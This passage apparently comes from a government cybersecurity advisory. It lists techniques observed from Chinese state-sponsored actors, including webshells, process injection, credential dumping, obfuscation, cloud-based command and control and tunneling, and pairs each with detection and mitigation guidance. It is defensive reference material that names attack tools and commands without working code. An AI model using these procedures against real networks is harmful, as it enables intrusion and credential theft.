  • Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.
  • Perform integrity checks on critical servers to identify and investigate unexpected changes.
  • Have application developers sign their code using digital signatures to verify their identity.
  • Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.
  • Implement a least-privilege policy on web servers to reduce adversaries’ ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.
  • If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.
  • Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.
  • Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.
  • Establish, and backup offline, a “known good” version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.
  • Employ user input validation to restrict exploitation of vulnerabilities.
  • Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.
  • Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.

Detect: 

  • Network Traffic Analysis
    • Client-server Payload Profiling [D3-CSPP]
    • Per Host Download-Upload Ratio Analysis [D3-PHDURA]
  • Process Analysis 
    • Process Spawn Analysis
      • Process Lineage Analysis [D3-PLA]

Isolate:

  • Network Isolation
    • Inbound Traffic Filtering [D3-ITF]

Create or Modify System Process [T1543]:

Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.

Note: this technique also applies to Privilege Escalation [TA0004].

  • Only allow authorized administrators to make service changes and modify service configurations. 
  • Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.
  • Monitor WMI and PowerShell for service modifications.
Detect:

  • Process Analysis 
    • Process Spawn Analysis [D3-PSA]

Tactics: Privilege Escalation [TA0004]

Table VI: Chinese state-sponsored cyber actors’ Privilege Escalation TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques
Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques

Domain Policy Modification [T1484]

Chinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.

Note: this technique also applies to Defense Evasion [TA0005].

  • Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.
  • Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.
  • Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.

Detect:

  • Network Traffic Analysis
    • Administrative Network Activity Analysis [D3-ANAA]
  • Platform Monitoring
    • Operating System Monitoring

Process Injection [T1055]: 

Chinese state-sponsored cyber actors have been observed:

  • Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement.
  • Using shellcode that injects implants into newly created instances of the Service Host process (svchost)

Note: this technique also applies to Defense Evasion [TA0005].
 

  • Use endpoint protection software to block process injection based on behavior of the injection process.
  • Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
  • Monitor for suspicious sequences of Windows API calls such as CreateRemoteThread, VirtualAllocEx, or WriteProcessMemory and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.
  • To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.
  • Execution Isolation
    • Hardware-based Process Isolation [D3-HBPI]
    • Mandatory Access Control [D3-MAC]

Tactics: Defense Evasion [TA0005]

Table VII: Chinese state-sponsored cyber actors’ Defensive Evasion TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques
Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques

Deobfuscate/Decode Files or Information [T1140]

Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.

  • Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
  • Consider blocking, disabling, or monitoring use of 7-Zip.

Detect: 

  • Process Analysis 
    • Process Spawn Analysis [D3-PSA]

Isolate: 

  • Execution Isolation
    • Executable Denylisting [D3-EDL]

Hide Artifacts [T1564]

Chinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.

  • Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.
  • Monitor event and authentication logs for records of hidden artifacts being used.
  • Monitor the file system and shell commands for hidden attribute usage.

Detect: 

  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA

Isolate:

  • Execution Isolation
    • Executable Allowlisting [D3-EAL]

Indicator Removal from Host [T1070]

Chinese state-sponsored cyber actors have been observed deleting files using rm or del commands.
Several files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.

  • Make the environment variables associated with command history read only to ensure that the history is preserved.
  • Recognize timestomping by monitoring the contents of important directories and the attributes of the files. 
  • Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their ~/.bash_history or ConsoleHost_history.txt files.
  • Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.
  • Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.

Detect: 

  • Platform Monitoring
    • Operating System Monitoring
  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA

Isolate:

  • Execution Isolation
    • Executable Allowlisting [D3-EAL]

Obfuscated Files or Information [T1027]

Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.

Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.

Detect:

  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA]

Signed Binary Proxy Execution [T1218]

Chinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as Rundll32, as a proxy to execute malicious payloads.

Monitor processes for the execution of known proxy binaries (e.g., rundll32.exe) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.

Detect:

  • Process Analysis

    • File Access Pattern Analysis [D3-FAPA]

    • Process Spawn Analysis [D3-PSA

Tactics: Credential Access [TA0006]

Table VIII: Chinese state-sponsored cyber actors’ Credential Access TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques
Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques

Exploitation for Credential Access [T1212]

Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.

  • Update and patch software regularly.

  • Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.

Harden: 

  • Platform Hardening

  • Credential Hardening

OS Credential Dumping [T1003]
•    LSASS Memory [T1003.001]
•    NTDS [T1003.003]

Chinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (NDST.DIT) for credential dumping.

  • Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NDST.DIT.

  • Ensure that local administrator accounts have complex, unique passwords across all systems on the network.

  • Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.

  • Consider disabling or restricting NTLM. 

  • Consider disabling WDigest authentication. 

  • Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).

  • Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements. 

  • Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.

Harden:

Detect: 

  • Process Analysis

    • File Access Pattern Analysis [D3-FAPA]

    • System Call Analysis [D3-SCA]

Isolate: 

  • Execution Isolation

    • Hardware-based Process Isolation [D3-HBPI]

    • Mandatory Access Control [D3-MAC]

Tactics: Discovery [TA0007]

Table IX: Chinese state-sponsored cyber actors’ Discovery TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques
Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques

File and Directory Discovery [T1083]

Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.

Detect: 

  • User Behavior Analysis

  • Process Analysis 

    • Database Query String Analysis [D3-DQSA]

    • File Access Pattern Analysis [D3-FAPA]

    • Process Spawn Analysis [D3-PSA]

Permission Group Discovery [T1069]

Chinese state-sponsored cyber actors have been observed using commands, including net group and net localgroup, to enumerate the different user groups on the target network. 

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Detect: 

  • Process Analysis 

  • Process Spawn Analysis [D3-PSA]

  • User Behavior Analysis [D3-UBA]  

Process Discovery [T1057]

Chinese state-sponsored cyber actors have been observed using commands, including tasklist, jobs, ps, or taskmgr, to reveal the running processes on victim devices.

Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. 

Detect: 

Network Service Scanning [T1046]

Chinese state-sponsored cyber actors have been observed using Nbtscan and nmap to scan and enumerate target network information.

•    Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation.
•    Use network intrusion detection and prevention systems to detect and prevent remote service scans such as Nbtscan or nmap.
•    Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.

Detect: 

Isolate:

Remote System Discovery [T1018]

Chinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including ping, net group, and net user to enumerate target network information.

Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.

Detect: 

  • Process Analysis 

  • User Behavior Analysis

Tactics: Lateral Movement [TA0008]

Table X: Chinese state-sponsored cyber actors’ Lateral Movement TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques
Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques

Exploitation of Remote Services [T1210]

Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.

Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.

Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.

Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.

  • Disable or remove unnecessary services.

  • Minimize permissions and access for service accounts.

  • Perform vulnerability scanning and update software regularly.

  • Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.

Detect: 

Isolate:

Tactics: Collection [TA0009]

Table XI: Chinese state-sponsored cyber actors’ Collection TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques
Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques

Archive Collected Data [T1560]

Chinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.

  • Scan systems to identify unauthorized archival utilities or methods unusual for the environment.

  • Monitor command-line arguments for known archival utilities that are not common in the organization’s environment.

Detect: 

  • Process Analysis 

    • File Access Pattern Analysis [D3-FAPA]

    • Process Spawn Analysis [D3-PSA]

Isolate:

Clipboard Data [T1115]

Chinese state-sponsored cyber actors used RDP and execute rdpclip.exe to exfiltrate information from the clipboard.

  • Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of pbcopy/pbpaste (Linux) or clip.exe (Windows) run by general users through command line).

  • If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor’s ability to exfiltrate data.

Detect:

Isolate:

  • Network Isolation

    • Inbound Traffic Filtering [D3-ITF]

    • Outbound Traffic Filtering [D3-OTF

Data Staged [T1074]

Chinese state-sponsored cyber actors have been observed using the mv command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.

Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.

Detect: 

Email Collection [T1114]

Chinese state-sponsored cyber actors have been observed using the New-MailboxExportRequest PowerShell cmdlet to export target email boxes.

  • Audit email auto-forwarding rules for suspicious or unrecognized rulesets.

  • Encrypt email using public key cryptography, where feasible.

  • Use MFA on public-facing mail servers.

Harden:

  • Credential Hardening

  • Message Hardening

Detect: 

Tactics: Command and Control [TA0011]

Table XII: Chinese state-sponsored cyber actors’ Command and Control TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques
 
Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques

Application Layer Protocol [T1071]

Chinese state-sponsored cyber actors have been observed:

  • Using commercial cloud storage services for command and control.

  • Using malware implants that use the Dropbox® API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive® API.

Use network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.

Detect: 

Isolate: 

Ingress Tool Transfer [T1105]

Chinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.

  • Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. 

  • Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.

  • Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.

Isolate:

Non-Standard Port [T1571]

Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. 

  • Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.

  • Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.

  • Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.

Detect:  

  • Network Traffic Analysis

    • Client-server Payload Profiling [D3-CSPP]

    • Protocol Metadata Anomaly Detection [D3-PMAD]

Isolate:

  • Network Isolation

    • Inbound Traffic Filtering [D3-ITF]

    • Outbound Traffic Filtering [D3-OTF]

Protocol Tunneling [T1572]

Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and dns2tcp.exe to conceal C2 traffic with existing network activity. 

  • Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.

  • Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.

  • Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) 

Detect: 

Proxy [T1090]: 

Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.

Monitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.

  • Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.

  • Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.

Detect: 

  • Network Traffic Analysis

    • Protocol Metadata Anomaly Detection [D3-PMAD]

    • Relay Pattern Analysis [D3-RPA]

Isolate: 

Appendix B: MITRE ATT&CK Framework 

Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors (Click here for the downloadable JSON file.) 

Source…